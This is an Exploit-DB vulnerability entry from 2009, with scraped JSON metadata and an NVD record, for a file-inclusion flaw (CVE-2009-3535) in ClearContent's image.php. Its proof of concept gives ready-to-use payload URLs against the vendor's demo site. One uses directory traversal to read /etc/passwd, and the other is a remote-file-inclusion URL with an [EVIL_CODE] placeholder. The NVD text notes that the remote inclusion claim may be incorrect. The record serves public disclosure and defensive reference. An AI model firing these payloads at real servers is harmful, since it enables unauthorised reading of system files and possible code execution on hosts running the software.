ID EDB-ID:9089Type exploitdbReporter MizoZModified 2009-07-09T00:00:00
Description
ClearContent (image.php url) RFI/LFI Vulnerability. CVE-2009-3535. Webapps exploit for php platform
----------------------------------------------------------------------------------------------------
Name : ClearContent
Site : http://www.allisclear.com/
Demo : http://demo.allisclear.com/
----------------------------------------------------------------------------------------------------
Found By : MizoZ [EvilWay Team]
Made in : Morocco
Contact : mizozx[at]gmail[dot]com
Greetz : Moudi , Zuka , All friends
----------------------------------------------------------------------------------------------------
P0c:
LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd
RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???
RFI needs register_globals=on;
----------------------------------------------------------------------------------------------------
# milw0rm.com [2009-07-09]
{"id": "EDB-ID:9089", "hash": "181d6b2f25ad2626d09e135d98f144ea", "type": "exploitdb", "bulletinFamily": "exploit", "title": "ClearContent image.php url RFI/LFI Vulnerability", "description": "ClearContent (image.php url) RFI/LFI Vulnerability. CVE-2009-3535. Webapps exploit for php platform", "published": "2009-07-09T00:00:00", "modified": "2009-07-09T00:00:00", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "href": "https://www.exploit-db.com/exploits/9089/", "reporter": "MizoZ", "references": [], "cvelist": ["CVE-2009-3535"], "lastseen": "2016-02-01T09:51:00", "history": [], "viewCount": 5, "enchantments": {"score": {"value": 6.5, "vector": "NONE", "modified": "2016-02-01T09:51:00"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2009-3535"]}], "modified": "2016-02-01T09:51:00"}, "vulnersScore": 6.5}, "objectVersion": "1.4", "sourceHref": "https://www.exploit-db.com/download/9089/", "sourceData": "----------------------------------------------------------------------------------------------------\n\n Name : ClearContent\n Site : http://www.allisclear.com/\n\n Demo : http://demo.allisclear.com/\n\n----------------------------------------------------------------------------------------------------\n\n \n Found By : MizoZ [EvilWay Team]\n\n Made in : Morocco\n Contact : mizozx[at]gmail[dot]com\n Greetz : Moudi , Zuka , All friends\n\n\n----------------------------------------------------------------------------------------------------\n\n\n P0c:\n \n LFI: http://demo.allisclear.com/image.php?url=../../../../../../../../../../etc/passwd\n RFI: http://demo.allisclear.com/image.php?url=[EVIL_CODE]???\n\n\n RFI needs register_globals=on;\n\n----------------------------------------------------------------------------------------------------\n\n# milw0rm.com [2009-07-09]\n", "osvdbidlist": ["55742"], "_object_type": "robots.models.exploitdb.ExploitDbBulletin", "_object_types": ["robots.models.exploitdb.ExploitDbBulletin", "robots.models.base.Bulletin"]}
{"cve": [{"lastseen": "2019-05-29T18:10:00", "bulletinFamily": "NVD", "description": "Directory traversal vulnerability in image.php in Clear Content 1.1 allows remote attackers to read arbitrary files via a .. (dot dot) in the url parameter. NOTE: the researcher also suggests an analogous PHP remote file inclusion vulnerability, but this may be incorrect.", "modified": "2017-09-19T01:29:00", "id": "CVE-2009-3535", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3535", "published": "2009-10-02T19:30:00", "title": "CVE-2009-3535", "type": "cve", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}]}
